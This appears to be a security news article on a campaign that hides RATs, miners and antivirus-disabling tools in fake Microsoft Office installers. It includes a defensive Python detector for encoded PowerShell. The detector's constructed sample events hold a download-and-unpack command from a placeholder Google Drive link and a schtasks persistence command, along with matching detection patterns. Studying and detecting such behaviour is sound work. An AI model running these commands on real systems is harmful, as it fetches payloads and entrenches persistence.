
Distribution of malware via counterfeit copies of Microsoft Office

Malware campaign analysis using counterfeit installers of popular software

A malware campaign distributes pirated software, exploiting fake Microsoft Office installers. Download URLs point to legitimate services, making identification difficult. The malware includes RATs, cryptocurrency miners and antivirus evasion tools.


The AhnLab Security Intelligence Center (ASEC) has revealed a new malicious campaign targeting users looking for pirated versions of popular software such as Microsoft Office, Windows, and Hangul Word Processor. Hackers exploit fake Microsoft Office installers, tricking victims with a well-designed interface that allows them to choose between different versions, languages, and 32-bit or 64-bit architectures. Behind this facade, various types of malware are hidden, including RATs, cryptocurrency miners, droppers, proxies and antivirus evasion systems. The fake installer launches obfuscated .NET malware, which connects to messaging channels such as Telegram or Mastodon to obtain a genuine download URL.

Malware distribution methodology

The distributed URLs point to legitimate services such as Google Drive or GitHub, which makes them harder for antivirus products to flag. The payloads are base64 encoded and contain PowerShell commands that unpack the different malware strains with 7-Zip. Among the components identified is one named "Updater", which uses the Windows Task Scheduler to keep the threats persistent across system restarts. This technique gives the attackers continuous access to the compromised system and makes the infection difficult for victims to remove completely.
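As an added defender-side example (not code from ASEC's report or from the campaign), the following Python decodes `-EncodedCommand` PowerShell found in process-creation events and flags the behaviours described above: 7-Zip extraction, Task Scheduler persistence and downloads from legitimate hosting. The event records and the scripts inside them are constructed for the example, and the Google Drive id is a placeholder.

```python
import base64
import binascii
import re

# -EncodedCommand and the abbreviations PowerShell accepts, followed by the base64 blob
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Behaviours from the report, expressed as regexes over the decoded script text
INDICATORS = {
    "7zip_extract": re.compile(r"\b7z[ar]?(?:\.exe)?['\"]?\s+x\b", re.IGNORECASE),
    "schtask_persistence": re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.IGNORECASE),
    "legit_hosting_download": re.compile(r"drive\.google\.com|(?:raw\.)?github(?:usercontent)?\.com", re.IGNORECASE),
    "nested_base64": re.compile(r"FromBase64String", re.IGNORECASE),
}


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (PowerShell uses UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scan_process_events(events):
    """Decode encoded PowerShell in process-creation events and report the indicators each one matches."""
    findings = []
    for ev in events:
        script = decode_encoded_command(ev["cmdline"])
        if script is None:
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
        if hits:
            findings.append({"pid": ev["pid"], "indicators": hits, "script": script})
    return findings


def _encode_ps(script):
    """Builds the constructed sample below the way PowerShell expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not from the report): staged download + unpack, persistence, and one benign
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": "powershell.exe -nop -w hidden -enc " + _encode_ps(
        "Invoke-WebRequest 'https://drive.google.com/uc?id=PLACEHOLDER' -OutFile p.7z; "
        "& 'C:\\Users\\Public\\7z.exe' x p.7z -oC:\\Users\\Public\\Updater")},
    {"pid": 4188, "cmdline": "powershell.exe -EncodedCommand " + _encode_ps(
        "schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\Updater\\Updater.exe")},
    {"pid": 4201, "cmdline": "powershell.exe -ec " + _encode_ps("Get-Date | Out-File log.txt")},
]

if __name__ == "__main__":
    for finding in scan_process_events(SAMPLE_EVENTS):
        print(finding["pid"], finding["indicators"])
```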

Types of malware involved

ASEC research identified various types of malware installed via this campaign. Among these, Orcus RAT is a remote access Trojan that allows total control of the system, with keylogging functions, webcam access and other exfiltration capabilities. XMRig is a cryptocurrency miner that leverages system resources to mine Monero, suspending mining during heavy resource use to avoid suspicion. 3Proxy turns infected systems into proxy servers, allowing attackers to route malicious traffic. PureCrypter downloads and executes additional malicious payloads, ensuring continued infection. Finally, AntiAV disables security software, manipulating its configuration files to prevent it from working properly and leaving the system vulnerable.

Implications and advice for users

This strategy of infection through pirated software is not new but continues to be effective, as demonstrated by the spread of the STOP ransomware, currently one of the most active ransomware operations targeting consumer users. Pirated programs lack digital signatures, and users tend to ignore security warnings because they know they are using unofficial material. This behavior, combined with visual discrepancies that are easily overlooked, makes pirated files an ideal vector for malware infections. You are strongly advised to avoid downloading and installing pirated software and to always use authentic, up-to-date versions of programs to avoid security compromises.


06/02/2024 08:31

Marco Verro
